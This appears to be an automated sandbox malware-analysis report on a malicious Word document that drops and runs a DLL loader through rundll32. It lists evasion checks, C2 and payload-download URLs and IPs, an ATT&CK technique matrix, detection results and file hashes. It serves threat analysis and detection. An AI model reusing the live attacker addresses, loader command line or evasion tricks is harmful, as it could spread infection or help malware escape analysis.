      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\rundll32.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      barindex
      Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 0000000180002AE1 second address: 0000000180002B06 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
      Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 0000000180002B1B second address: 0000000180002B28 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180002AC0 SwitchToThread,SwitchToThread,
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader_p3_dll_64_n3_crypt_x64_asm_clone_n152[1].dllJump to dropped file
      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180002174 rdtsc
      Source: C:\Windows\System32\rundll32.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180001C28 GetComputerNameExW,LookupAccountNameW,GetLastError,GetProcessHeap,HeapAlloc,LookupAccountNameW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180002174 rdtsc
      Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exeCode function: 4_2_00041189 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\System32\rundll32.exeNetwork Connect: 64.227.108.27 80
      Source: C:\Windows\System32\rundll32.exeDomain query: alexbionka.com
      Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe" "C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll",#1
      Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exeCode function: 4_2_00041593 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180002018 GetComputerNameExW,GetUserNameW,wsprintfW,wsprintfW,wsprintfW,

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1552, type: MEMORYSTR
      Source: Yara matchFile source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1552, type: MEMORYSTR
      Source: Yara matchFile source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE
      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts2
      Command and Scripting Interpreter
      Path Interception111
      Process Injection
      1
      Masquerading
      OS Credential Dumping1
      System Time Discovery
      Remote Services1
      Archive Collected Data
      Exfiltration Over Other Network Medium2
      Encrypted Channel
      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default Accounts12
      Scripting
      Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
      Disable or Modify Tools
      LSASS Memory22
      Security Software Discovery
      Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth14
      Ingress Tool Transfer
      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain Accounts1
      Native API
      Logon Script (Windows)Logon Script (Windows)111
      Process Injection
      Security Account Manager1
      Account Discovery
      SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
      Non-Application Layer Protocol
      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local Accounts33
      Exploitation for Client Execution
      Logon Script (Mac)Logon Script (Mac)12
      Scripting
      NTDS1
      System Owner/User Discovery
      Distributed Component Object ModelInput CaptureScheduled Transfer123
      Application Layer Protocol
      SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
      Obfuscated Files or Information
      LSA Secrets1
      Remote System Discovery
      SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common1
      Rundll32
      Cached Domain Credentials1
      System Network Configuration Discovery
      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
      File and Directory Discovery
      Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem24
      System Information Discovery
      Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      dodsonimaging,file,08.11.2022.doc26%VirustotalBrowse
      dodsonimaging,file,08.11.2022.doc100%Joe Sandbox ML
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll100%AviraHEUR/AGEN.1251556
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader_p3_dll_64_n3_crypt_x64_asm_clone_n152[1].dll100%AviraHEUR/AGEN.1251556
      C:\Users\user\AppData\Local\Temp\~DF4786325F45128C5F.TMP100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe0%MetadefenderBrowse
      C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe0%ReversingLabs
      SourceDetectionScannerLabelLinkDownload
      5.2.rundll32.exe.180000000.1.unpack100%AviraHEUR/AGEN.1205098Download File
      5.2.rundll32.exe.7fef74d0000.2.unpack100%AviraHEUR/AGEN.1251556Download File
      No Antivirus matches
      SourceDetectionScannerLabelLink
      alexbionka.com0%Avira URL Cloudsafe
      http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rma0%Avira URL Cloudsafe
      http://alexbionka.com/0%Avira URL Cloudsafe
      http://45.8.1460%Avira URL Cloudsafe
      http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm0%Avira URL Cloudsafe
      http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm&0%Avira URL Cloudsafe
      http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm516F-U91Z1DJNJ2U9D-823/rm3/rm3/rm0%Avira URL Cloudsafe
      http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rmli0%Avira URL Cloudsafe
      http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rmT&0%Avira URL Cloudsafe
      http://45.8.146.139/fhfty/O-M--V4GO6510%Avira URL Cloudsafe
      http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rmj0%Avira URL Cloudsafe
      http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rmv&0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      alexbionka.com
      64.227.108.27
      truetrue
        unknown
        NameMaliciousAntivirus DetectionReputation
        alexbionka.comtrue
        • Avira URL Cloud: safe
        unknown
        http://alexbionka.com/true
        • Avira URL Cloud: safe
        unknown
        http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rmfalse
        • Avira URL Cloud: safe
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rmar8F8A.tmp.exe, 00000004.00000002.947204650.0000000000520000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://45.8.146rundll32.exe, 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        low
        http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm&r8F8A.tmp.exe, 00000004.00000002.947193974.00000000002C0000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm516F-U91Z1DJNJ2U9D-823/rm3/rm3/rmrundll32.exe, 00000005.00000002.946524016.0000000000420000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rmlir8F8A.tmp.exe, 00000004.00000002.947204650.0000000000520000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rmT&r8F8A.tmp.exe, 00000004.00000002.947193974.00000000002C0000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://45.8.146.139/fhfty/O-M--V4GO651r8F8A.tmp.exe, 00000004.00000002.947212998.0000000000544000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rmjr8F8A.tmp.exe, 00000004.00000002.947197812.0000000000360000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rmv&r8F8A.tmp.exe, 00000004.00000002.947193974.00000000002C0000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        45.8.146.139
        unknownRussian Federation
        44676VMAGE-ASRUfalse
        64.227.108.27
        alexbionka.comUnited States
        14061DIGITALOCEAN-ASNUStrue
        Joe Sandbox Version:35.0.0 Citrine
        Analysis ID:682555
        Start date and time:2022-08-11 17:26:52 +02:00
        Joe Sandbox Product:CloudBasic
        Overall analysis duration:0h 6m 25s
        Hypervisor based Inspection enabled:false
        Report type:light
        Sample file name:dodsonimaging,file,08.11.2022.doc
        Cookbook file name:defaultwindowsofficecookbook.jbs
        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
        Number of analysed new started processes analysed:6
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • HDC enabled
        • GSI enabled (VBA)
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Detection:MAL
        Classification:mal100.troj.expl.evad.winDOC@5/14@2/2
        EGA Information:
        • Successful, ratio: 100%
        HDC Information:
        • Successful, ratio: 57.5% (good quality ratio 39.1%)
        • Quality average: 51.4%
        • Quality standard deviation: 40.7%
        HCA Information:
        • Successful, ratio: 97%
        • Number of executed functions: 0
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Found application associated with file extension: .doc
        • Adjust boot time
        • Enable AMSI
        • Found Word or Excel or PowerPoint or XPS Viewer
        • Attach to Office via COM
        • Scroll down
        • Close Viewer
        • Exclude process from analysis (whitelisted): dllhost.exe
        • TCP Packets have been reduced to 100
        • Report size getting too big, too many NtQueryAttributesFile calls found.
        TimeTypeDescription
        17:27:36API Interceptor1x Sleep call for process: rundll32.exe modified
        No context
        No context
        No context
        No context
        No context
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
        Category:downloaded
        Size (bytes):360448
        Entropy (8bit):4.669605444265748
        Encrypted:false
        SSDEEP:6144:4YCYa6MfAcSlE+S0fzAMJfWpKd5WhAl7CJDZ/PeHbUhHTmGPqG7s6FmlEHKiTd:/CwMfjSlE+A4eguRJDtPZIG46FkEH9
        MD5:18CC94DD7BBBFF54DF547A4F47346F01
        SHA1:B13786283F076A3E95BEDF277C4AD5CCF74D407E
        SHA-256:2FFB609277439F8D2F4E2716C54F282030BA717A59234098F364205BCF37FE9C
        SHA-512:798FB93688E812ED1AC854B9B4CF93E2A5BD5A3602CFED7F266B64526480A2102527C310513726800F6390D47E3F37444C0B4E90945B92EA73A6FA13328E5B67
        Malicious:true
        Antivirus:
        • Antivirus: Avira, Detection: 100%
        Reputation:low
        IE Cache URL:http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm
        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.4...Z...Z...Z...Y...Z.Y.Z...Z.3...Z.j.X...Z.Rich..Z.........................PE..d...Y..b.........." .....x................................................................`.............................................}............................................................................................................................text....w.......x.................. ..`.rdata..}............|..............@..@.rsrc................~..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:PNG image data, 440 x 440, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):256043
        Entropy (8bit):7.978649843052502
        Encrypted:false
        SSDEEP:3072:oHOxTlIBnmM5ZwN3oWcuwnPlWUHeMlJ3NsT51XIcxe38wh06q6vOYgMC4Gy0HBZ8:5TJ+K2P5lmDICe38wi6vrgLRiw981
        MD5:D3341817BB7485FA43E737DDCCFCDA50
        SHA1:B14836FF62F326C98E26218754BBFE85DBA7A654
        SHA-256:A2482A832CC317A2D773F9FCDFCF843ED8E84597F9B382DB0420DC5578D56943
        SHA-512:AE51BACA31BAFD99D370531AD8E2E92EF4B38AACAF8E2684E9D23BDB8C0E85D23E2CDED482D314A30C364D5F6071D9B7F8E61D98656A8532C56409906B2AB920
        Malicious:false
        Reputation:low
